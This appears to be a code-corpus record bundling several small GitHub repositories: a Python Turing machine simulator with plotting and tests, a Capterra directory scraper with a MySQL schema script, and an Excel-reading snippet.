tag](https://raw.githubusercontent.com/marekq/aws-ip-ranges/master/docs/2.png)\n\n\nTo-do list\n---------\n\n- Add IPv6 support for security groups, currently only IPv4 ranges will be updated. \n- Integrate SNS as a trigger for the Lambda so that changes in IP ranges can be detected faster. \n- Add a simpler way to change the security group port and add UDP support.\n- Add support for whitelisting PrivateLink connections available in the VPC. \n- Add support for whitelisting custom ranges other than from AWS (i.e. a company's private/public IP ranges).\n\nContact\n-------\n\nIn case of questions or bugs, please raise an issue or reach out to @marekq!" } ]
2
WarleiCanuto/MT
https://github.com/WarleiCanuto/MT
d51fa38b2a0fe42e692b9445f287ab42f4177619
b827dec4686fa6316011fb973972ac2891bc6848
7506d324b1462e63aecf8863df09d43679d0ea34
refs/heads/main
2023-05-10T09:51:02.390960
2021-05-28T13:12:35
2021-05-28T13:12:35
371,117,562
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6765432357788086, "alphanum_fraction": 0.7160493731498718, "avg_line_length": 29.30769157409668, "blob_id": "40761107ec2ae3060dea4927715d71b28c07be45", "content_id": "9fa473c62e45654e14777720e16b97eae0e00f07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 409, "license_type": "no_license", "max_line_length": 56, "num_lines": 13, "path": "/graf.py", "repo_name": "WarleiCanuto/MT", "src_encoding": "UTF-8", "text": "from matplotlib import pyplot\r\nfrom MT import plot\r\n\r\ndata_it, data_tam, data_plvrs, data0, data1 = plot()\r\nprint(data_it)\r\nprint(data_tam)\r\npyplot.scatter(data_tam, data_it)\r\n#pyplot.plot(data0, 'r') #Numero de 0s VERMELHO (*10000)\r\n#pyplot.plot(data1, 'g') #Numero de 1s VERDE (*10000)\r\npyplot.title('Gráfico de Dispersão')\r\npyplot.ylabel(\"Iterações\")\r\npyplot.xlabel(\"Tamanho da Palavra\")\r\npyplot.show()" }, { "alpha_fraction": 0.6418439745903015, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 26.299999237060547, "blob_id": "f0493e205f21b63737887eb8c6a60d8ed5b2804b", "content_id": "6efc8d761e2b1cf5dea58c066fe402279330dbf5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 568, "license_type": "no_license", "max_line_length": 78, "num_lines": 20, "path": "/unitt.py", "repo_name": "WarleiCanuto/MT", "src_encoding": "UTF-8", "text": "import unittest\r\nimport random\r\nfrom MT import aceitacao\r\npalavras_teste = []\r\n\r\n#palavras_teste.append('1100') Reprovada\r\n#Quando o numero de 1s é maior ou igual a 6 o tempo de execução é alto\r\n\r\nfor p in range(20):\r\n palavras_teste.append('0'*random.randint(1, 5) + '1'*random.randint(1, 5))\r\nprint(palavras_teste)\r\n\r\nclass FuncTeste(unittest.TestCase):\r\n def test_aceitacao(self):\r\n for p in palavras_teste:\r\n self.assertTrue(aceitacao(p))\r\n\r\nif __name__ == \"__main__\":\r\n unittest.main()\r\n #Lembrar de remover os prints para testar" }, { "alpha_fraction": 0.3257015347480774, "alphanum_fraction": 0.3854643702507019, "avg_line_length": 34.71120834350586, "blob_id": "e36b59e1eedc00795efec73e912e6a967b2c6b0d", "content_id": "e1d77c6c84c5b3a58f094e3a46bc082b0a3d2b06", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8528, "license_type": "no_license", "max_line_length": 213, "num_lines": 232, "path": "/MT.py", "repo_name": "WarleiCanuto/MT", "src_encoding": "UTF-8", "text": "import random\r\nfrom numpy import mean\r\nfrom numpy import std\r\nfrom numpy import correlate\r\nfrom numpy.random import randn\r\nfrom numpy.random import seed\r\nfrom matplotlib import pyplot\r\n\r\nQ={'q0', 'q1','q2','q3','q4','q5','q6','q7','q8','q9','q10','q11','q12','q13','q14','q15','q16','q17','q18','q19','q20','q21','q22','q23', 'q24','q25','q26','q27','q28','q29','q30','q31','q32', 'q33','q34', 'q35'}\r\nS={'0', '1'}\r\nG={'0','1', 'X', 'Y', 'A', 'B', '.',' '}\r\nF={'q12', 'q25', 'q29','q30', 'q33', 'q35'}\r\nD={\r\n ('q0', '1'):('q0','1','R'),\r\n ('q0', '0'):('q0','0','R'),\r\n ('q0', 'Y'):('q0','Y','R'),\r\n ('q0', 'A'):('q0','A','R'),\r\n ('q0', '.'):('q0','.','R'),\r\n ('q0', ' '):('q1','.','L'),\r\n ('q1', ' '):('q7',' ','R'),\r\n ('q1', 'A'):('q1','A','L'),\r\n ('q1', '0'):('q1','0','L'),\r\n ('q1', 'Y'):('q1','Y','L'),\r\n ('q1', '.'):('q1','.','L'),\r\n ('q1', '1'):('q2','Y','L'),\r\n ('q2', '1'):('q2','1','L'),\r\n ('q2', '0'):('q3','X','R'),\r\n ('q3', ' '):('q4','A','L'),\r\n ('q3', 
'Y'):('q3','Y','R'),\r\n ('q3', 'X'):('q3','X','R'),\r\n ('q3', '.'):('q3','.','R'),\r\n ('q3', 'A'):('q3','A','R'),\r\n ('q3', '1'):('q3','1','R'),\r\n ('q4', '1'):('q4','1','L'),\r\n ('q4', 'A'):('q4','A','L'),\r\n ('q4', 'Y'):('q4','Y','L'),\r\n ('q4', '.'):('q4','.','L'),\r\n ('q4', 'X'):('q4','X','L'),\r\n ('q4', '0'):('q3','X','R'),\r\n ('q4', ' '):('q5',' ','R'),\r\n ('q5', 'X'):('q5','0','R'),\r\n ('q5', '1'):('q6','1','L'),\r\n ('q5', 'Y'):('q6','Y','L'),\r\n ('q6', '0'):('q6','0','L'),\r\n ('q6', ' '):('q0',' ','R'),\r\n ('q7', '0'):('q7',' ','R'),\r\n ('q7', 'Y'):('q7',' ','R'),\r\n ('q7', '.'):('q7',' ','R'),\r\n ('q7', 'A'):('q8','A','L'),\r\n ('q8', ' '):('q9',' ','R'),\r\n ('q9', 'A'):('q9','A','R'),\r\n ('q9', '.'):('q10','.','R'),\r\n ('q10', ' '):('q11',' ','L'),\r\n ('q10', 'A'):('q13','A','L'),\r\n ('q11', 'A'):('q11','0','L'),\r\n ('q11', '.'):('q11',' ','L'),\r\n ('q11', ' '):('q12',' ','R'),\r\n ('q13', '.'):('q13','.','L'),\r\n ('q13', 'A'):('q13','A','L'),\r\n ('q13', ' '):('q14',' ','R'),\r\n ('q14', 'A'):('q15',' ','R'),\r\n ('q14', '.'):('q20',' ','R'),\r\n ('q15', 'A'):('q15','A','R'),\r\n ('q15', '.'):('q16','.','R'),\r\n ('q16', '.'):('q19','.','L'),\r\n ('q16', 'A'):('q17','B','R'),\r\n ('q17', 'A'):('q17','A','R'),\r\n ('q17', 'B'):('q17','B','R'),\r\n ('q17', '.'):('q17','.','R'),\r\n ('q17', ' '):('q18','A','L'),\r\n ('q18', 'A'):('q18','A','L'),\r\n ('q18', '.'):('q18','.','L'),\r\n ('q18', 'B'):('q16','B','R'),\r\n ('q19', 'B'):('q19','A','L'),\r\n ('q19', '.'):('q19','.','L'),\r\n ('q19', 'A'):('q19','A','L'),\r\n ('q19', ' '):('q14',' ','R'),\r\n ('q20', 'A'):('q20',' ','R'),\r\n ('q20', '.'):('q21',' ','R'),\r\n ('q21', '.'):('q21','.','R'),\r\n ('q21', 'A'):('q21','A','R'),\r\n ('q21', ' '):('q22','.','L'),\r\n ('q22', 'A'):('q22','A','L'),\r\n ('q22', '.'):('q23','.','L'),\r\n ('q23', '.'):('q23','.','L'),\r\n ('q23', 'A'):('q23','A','L'),\r\n ('q23', ' '):('q14',' ','R'),\r\n ('q22', ' '):('q24',' ','R'),\r\n ('q24', 'A'):('q24','0','R'),\r\n ('q24', '.'):('q25',' ','L'),\r\n ('q26', '1'):('q27','1','R'),\r\n ('q26', ' '):('q30','0','R'),\r\n ('q26', '0'):('q31','0','R'),\r\n ('q27', '1'):('q27','1','R'),\r\n ('q27', ' '):('q28',' ','L'),\r\n ('q27', '0'):('q35','0','R'),\r\n ('q28', '1'):('q28',' ','L'),\r\n ('q28', ' '):('q29',' ','R'),\r\n ('q31', ' '):('q32',' ','L'),\r\n ('q31', '1'):('q34','1','R'),\r\n ('q31', '0'):('q31','0','R'),\r\n ('q32', '0'):('q32',' ','L'),\r\n ('q32', ' '):('q33','0','R'),\r\n ('q34', '0'):('q35','0','R'),\r\n ('q34', '1'):('q34','1','R'),\r\n ('q34', ' '):('q36',' ','L'),\r\n ('q36', '0'):('q36','0','L'),\r\n ('q36', '1'):('q36','1','L'),\r\n ('q36', ' '):('q0',' ','R'),\r\n}\r\nMT = (Q, S, G, D, 'q26',' ', F)\r\n\r\npalavra = '001100'\r\n\r\n#PLOT\r\npalavra_y = []\r\npalavra_x = []\r\npalavra_plot = []\r\ndata_iteracoes = []\r\ndata_tam_plvr = []\r\n\r\ndef aceitacao(plvr):\r\n if analisaPalavra_testes(MT, plvr):\r\n return True\r\n else:\r\n return False\r\n\r\ndef plot():\r\n for p in range(20):\r\n palavra = ('1'*random.randint(1, 5) + '0'*random.randint(1, 5))\r\n palavra_x.append(palavra.count('0')*10000)\r\n palavra_y.append(palavra.count('1')*10000)\r\n palavra_plot.append(palavra)\r\n data_tam_plvr.append(len(palavra))\r\n analisaPalavra_testes(MT, palavra)\r\n return data_iteracoes, data_tam_plvr, palavra_plot, palavra_x, palavra_y\r\n\r\ndef analisaPalavra(maquina, palavra):\r\n estados_finais = maquina[6]\r\n estado_inicial = maquina[4]\r\n direcao = ''\r\n palavra_final = ''\r\n palavra_list = 
list(palavra)\r\n i = 0\r\n estado_atual = estado_inicial\r\n palavra_completa = False\r\n iteracoes = 0\r\n print('Palavra: ', palavra,'\\n')\r\n\r\n while palavra_completa == False:\r\n for estadof in estados_finais:\r\n if estadof!= 'q35' and estado_atual == estadof:\r\n palavra_completa = True\r\n print('A palavra '+ palavra + ' foi aceita em ' + str(iteracoes) + ' iterações') \r\n print('Palavra final: ' + palavra_final.join(palavra for palavra in palavra_list if palavra != ' '))\r\n return True\r\n elif estadof == 'q35' and estado_atual == estadof:\r\n palavra_completa = True\r\n print('A palavra '+ palavra + ' foi rejeitada em ' + str(iteracoes) + ' iterações por não estar no formato 0^a1^b')\r\n return False\r\n for delta in maquina[3]:\r\n if (i + 1) > len(palavra_list):\r\n palavra_list.append(' ') \r\n if i < 0:\r\n palavra_list = [' '] + palavra_list\r\n i = 0\r\n if estado_atual == delta[0] and palavra_list[i] == delta[1]:\r\n iteracoes += 1\r\n transicao = maquina[3][delta]\r\n simbolo_ant = palavra_list[i]\r\n palavra_list[i] = transicao[1]\r\n if transicao[2] == 'R':\r\n direcao = 'direita'\r\n i += 1\r\n else:\r\n direcao = 'esquerda'\r\n i -= 1\r\n if estado_atual != transicao[0]:\r\n print('Sai do estado ' + estado_atual + ' para o estado ' + transicao[0] + ' trocando o simbolo ' + simbolo_ant + ' pelo símbolo' + transicao[1] + ' em direção a ' + direcao)\r\n print('\\nFita:', palavra_list, '\\n')\r\n estado_atual = transicao[0]\r\n break\r\n elif estado_atual == transicao[0]:\r\n print('Permanece no ' + estado_atual + ' lê o simbolo ' + simbolo_ant + ' e anda em direção a ' + direcao)\r\n print('\\nFita:', palavra_list, '\\n')\r\n break\r\n\r\n#Sem prints\r\ndef analisaPalavra_testes(maquina, palavra):\r\n estados_finais = maquina[6]\r\n estado_inicial = maquina[4]\r\n direcao = ''\r\n palavra_final = ''\r\n palavra_list = list(palavra)\r\n i = 0\r\n estado_atual = estado_inicial\r\n palavra_completa = False\r\n iteracoes = 0\r\n print('Palavra: ', palavra,'\\n')\r\n\r\n while palavra_completa == False:\r\n for estadof in estados_finais:\r\n if estadof!= 'q35' and estado_atual == estadof:\r\n palavra_completa = True\r\n data_iteracoes.append(iteracoes) #PLOT\r\n return True\r\n elif estadof == 'q35' and estado_atual == estadof:\r\n palavra_completa = True\r\n data_iteracoes.append(iteracoes) #PLOT\r\n return False\r\n for delta in maquina[3]:\r\n if (i + 1) > len(palavra_list):\r\n palavra_list.append(' ') \r\n if i < 0:\r\n palavra_list = [' '] + palavra_list\r\n i = 0\r\n if estado_atual == delta[0] and palavra_list[i] == delta[1]:\r\n iteracoes += 1\r\n transicao = maquina[3][delta]\r\n simbolo_ant = palavra_list[i]\r\n palavra_list[i] = transicao[1]\r\n if transicao[2] == 'R':\r\n direcao = 'direita'\r\n i += 1\r\n else:\r\n direcao = 'esquerda'\r\n i -= 1\r\n if estado_atual != transicao[0]:\r\n estado_atual = transicao[0]\r\n break\r\n elif estado_atual == transicao[0]:\r\n break\r\n" } ]
3
winnerineast/capterra
https://github.com/winnerineast/capterra
ec1b5c241f8782d1c0455f49be2abd15ce0574cc
382d510284a6881f921ad55f46083744c5963a2b
7d092b1f840eb4aa99bf74c795d03f972d950306
refs/heads/master
2023-06-29T06:57:11.566398
2021-07-17T15:33:13
2021-07-17T15:33:13
386,955,739
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7537993788719177, "alphanum_fraction": 0.7659574747085571, "avg_line_length": 41.956520080566406, "blob_id": "7fd5cf431d76f1bf611ecb86bd673b6f1f559b93", "content_id": "d9acdd55319a34717d542e8b5fc91c9c2ad533d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 987, "license_type": "no_license", "max_line_length": 120, "num_lines": 23, "path": "/README.md", "repo_name": "winnerineast/capterra", "src_encoding": "UTF-8", "text": "# Capterra Clone\nthis is project to create a clone database of capterra website.\n\n## How to use\n\n- The project can only run on Ubuntu. (we tested in Ubuntu 18.04)\n- Install mySQL database.\n- Install mysql-connector for python. \n- Update username and password in create_database.py.\n- Run create_database.py to setup empty database for capterra.\n- Run main.py to synchronize the online website with local database.\n- main.py has the following features:\n * automatically detect the software categories by name of category\n * automatically detect the software by name of software\n * both category and software information will be overridden (!!!)\n * No overridden for review data and only appending\n \n- (incoming) a local website to read local database\n\n## Work Daily\n- 2021.07.17\ncompleted create_database.py and simple webpage download and interpretation. now it's going to develop download webpage \n and insert them into database (so far don't do existing data detection)" }, { "alpha_fraction": 0.5989025831222534, "alphanum_fraction": 0.6126200556755066, "avg_line_length": 35.089107513427734, "blob_id": "b69da9455a98a6211e18918439723f4f81878d9c", "content_id": "113da616f0d3b1c2043e3110303f06df726af0f2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3645, "license_type": "no_license", "max_line_length": 153, "num_lines": 101, "path": "/main.py", "repo_name": "winnerineast/capterra", "src_encoding": "UTF-8", "text": "import requests\nimport urllib3\nfrom bs4 import BeautifulSoup\nimport json\nimport mysql.connector\nfrom mysql.connector import errorcode\n\n\nconfig = dict(user='root',\n password='1',\n host='127.0.0.1',\n database='capterra',\n raise_on_warnings=True,\n use_pure=True)\n\n\ndef start_requests(input_url):\n r = requests.get(input_url)\n return r.content\n\n\ndef parse_directory(html_text):\n soup = BeautifulSoup(html_text, 'html.parser')\n movie_list = soup.find_all('a', class_='list-group-item')\n\n result_list = []\n for item in movie_list:\n software_type = {'title': item.text, 'url': item['href']}\n result_list.append(software_type)\n return result_list\n\n\ndef get_redirect_url(previous_url):\n headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'}\n response = requests.get(previous_url, headers=headers)\n soup = BeautifulSoup(response.text, 'html.parser')\n redirect_url = soup.find('meta', attrs={'http-equiv': 'refresh'})\n actual_url = redirect_url['content'].partition('=')[2]\n try:\n response = requests.get(actual_url, headers=headers)\n except urllib3.exceptions.MaxRetryError as ex:\n print(\"the website is down.\")\n actual_url = str(ex).split('\\'')[1]\n print(actual_url)\n return actual_url\n except requests.exceptions.SSLError as ex:\n print(\"the website is not connected with SSL.\")\n actual_url = str(ex).split('\\'')[1]\n print(actual_url)\n return actual_url\n return response.url\n\n\ndef 
parse_software(software_type, html_text):\n soup = BeautifulSoup(html_text, 'html.parser')\n item_list = soup.find_all('div', class_='card product-card mb-3 border-primary pt-2')\n result_list = []\n for item in item_list:\n title = item.find(class_='evnt').string\n print(title)\n visit_url = item.find(class_='btn btn-preferred btn-sm text-truncate btn-block evnt')['href']\n website = get_redirect_url('https://www.capterra.com.sg'+visit_url)\n summary = item.find(class_='d-lg-none').get_text()\n software_type = {'type': software_type, 'title': title, 'summary': summary, 'website': website}\n result_list.append(software_type)\n return result_list\n\n\ndef get_page_number(html_text):\n soup = BeautifulSoup(html_text, 'html.parser')\n page_items = soup.find_all('li', class_='page-item')\n if bool(page_items):\n last_page = page_items[len(page_items) - 2].get_text()\n return int(last_page)\n return 1\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n\n with open('data.json', 'w', encoding='utf-8') as f:\n url = 'https://www.capterra.com.sg/directory'\n text = start_requests(url)\n directory = parse_directory(text)\n for current in directory:\n # print(current['url'])\n text = start_requests(current['url'])\n nPage = get_page_number(text)\n software_list = parse_software(current['title'], text)\n json.dump(software_list, f, ensure_ascii=False, indent=4)\n print(software_list)\n\n if 1 == nPage: continue\n\n for i in range(2, nPage + 1):\n new_url = current['url'] + '?page=' + str(i)\n print(new_url)\n text = start_requests(new_url)\n software_list = parse_software(current['title'], text)\n json.dump(software_list, f, ensure_ascii=False, indent=4)\n print(software_list)\n" }, { "alpha_fraction": 0.5633803009986877, "alphanum_fraction": 0.5744194984436035, "avg_line_length": 29.546510696411133, "blob_id": "a9f0ba7c5ae3fe1926b22e35344d95fad170997b", "content_id": "4f261e3be07e718761f86e608592c8dd72745660", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2627, "license_type": "no_license", "max_line_length": 83, "num_lines": 86, "path": "/create_database.py", "repo_name": "winnerineast/capterra", "src_encoding": "UTF-8", "text": "import mysql.connector\nfrom mysql.connector import errorcode\n\n\nconfig = dict(user='root',\n password='1',\n host='127.0.0.1',\n database='capterra',\n raise_on_warnings=True,\n use_pure=True)\n\nDB_NAME = 'capterra'\nTABLES = {'categories': (\n \"CREATE TABLE `categories` (\"\n \" `id` smallint NOT NULL AUTO_INCREMENT,\"\n \" `name` varchar(100) NOT NULL,\"\n \" `description` varchar(5000) NOT NULL,\"\n \" PRIMARY KEY (`id`)\"\n \") ENGINE=InnoDB\"),\n 'softwares': (\n \"CREATE TABLE `softwares` (\"\n \" `id` int NOT NULL AUTO_INCREMENT,\"\n \" `name` varchar(100) NOT NULL,\"\n \" `rating` tinyint NOT NULL,\"\n \" `summary` varchar(5000) NOT NULL,\"\n \" `features` json NOT NULL,\"\n \" `website` varchar(1000) NOT NULL,\"\n \" `about` json NOT NULL,\"\n \" `pricing` json NOT NULL,\"\n \" `deployment` json NOT NULL,\"\n \" `alternative` json NOT NULL,\"\n \" `reviews` json NOT NULL,\"\n \" PRIMARY KEY (`id`)\"\n \") ENGINE=InnoDB\"\n )\n}\n\n\ndef create_database(cur, data_name):\n try:\n cur.execute(\n \"CREATE DATABASE {} DEFAULT CHARACTER SET 'utf8mb4'\".format(data_name))\n except mysql.connector.Error as ex:\n print(\"Failed creating database: {}\".format(ex))\n exit(1)\n\n\ntry:\n cnx = mysql.connector.connect(**config)\nexcept mysql.connector.Error as err:\n if 
err.errno == errorcode.ER_ACCESS_DENIED_ERROR:\n print(\"Something is wrong with your user name or password\")\n elif err.errno == errorcode.ER_BAD_DB_ERROR:\n print(\"Database does not exist\")\n else:\n print(err)\nelse:\n cursor = cnx.cursor()\n try:\n cursor.execute(\"USE {}\".format(DB_NAME))\n print(\"Database {} exists and skip database creation.\".format(DB_NAME))\n except mysql.connector.Error as ex:\n print(\"Database {} does not exists.\".format(DB_NAME))\n if ex.errno == errorcode.ER_BAD_DB_ERROR:\n create_database(cursor, DB_NAME)\n print(\"Database {} created successfully.\".format(DB_NAME))\n cnx.database = DB_NAME\n else:\n print(ex)\n exit(1)\n\n for table_name in TABLES:\n table_description = TABLES[table_name]\n try:\n print(\"Creating table {}: \".format(table_name), end='')\n cursor.execute(table_description)\n except mysql.connector.Error as err:\n if err.errno == errorcode.ER_TABLE_EXISTS_ERROR:\n print(\"already exists.\")\n else:\n print(err.msg)\n else:\n print(\"OK\")\n\n cursor.close()\n cnx.close()\n" } ]
3
robertsmieja/python-sandbox
https://github.com/robertsmieja/python-sandbox
e702defd88ec9a5d8915fe80dbe8eabf71ac43de
672bf094adc0754ad139e57fc6eac0402b32afb2
82d7abeae12b0fca7d5a135734af15672ada892e
refs/heads/master
2020-06-02T05:28:43.447951
2019-06-09T20:49:15
2019-06-09T20:49:15
191,053,678
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6744186282157898, "alphanum_fraction": 0.6790697574615479, "avg_line_length": 14.357142448425293, "blob_id": "7f211d3d051b1fb67d0423b2f35d9a5c86fc0452", "content_id": "6009bd255ac72c4a2994a717edcca5c35dfc7fc8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 215, "license_type": "no_license", "max_line_length": 40, "num_lines": 14, "path": "/read_excel.py", "repo_name": "robertsmieja/python-sandbox", "src_encoding": "UTF-8", "text": "import openpyxl\n\n# grab excel file\nwb = openpyxl.load_workbook('File.xlsx')\n\n# grab worksheet\nws = wb['Sheet1']\n\n# get all rows in 'C'\nrowsInC = ws['C']\n\n# print each cell\nfor cell in rowsInC:\n print(cell.value)\n" }, { "alpha_fraction": 0.5992217659950256, "alphanum_fraction": 0.6070038676261902, "avg_line_length": 22.363636016845703, "blob_id": "8bb645fb7a1f59abd1af744c9327ab544cc0b500", "content_id": "2e9e0da4d983034e7c52cf3d4ee730a5d7f4497e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 257, "license_type": "no_license", "max_line_length": 49, "num_lines": 11, "path": "/README.md", "repo_name": "robertsmieja/python-sandbox", "src_encoding": "UTF-8", "text": "Python Sandbox\n==============\n\n# Requirements\n* [Python 3.7](https://www.python.org/downloads/)\n* [PipEnv](https://github.com/pypa/pipenv) \n * ```sh\n pip install --user pipenv\n ```\n## Recommended\n* [PyCharm](https://www.jetbrains.com/pycharm/)\n" } ]
2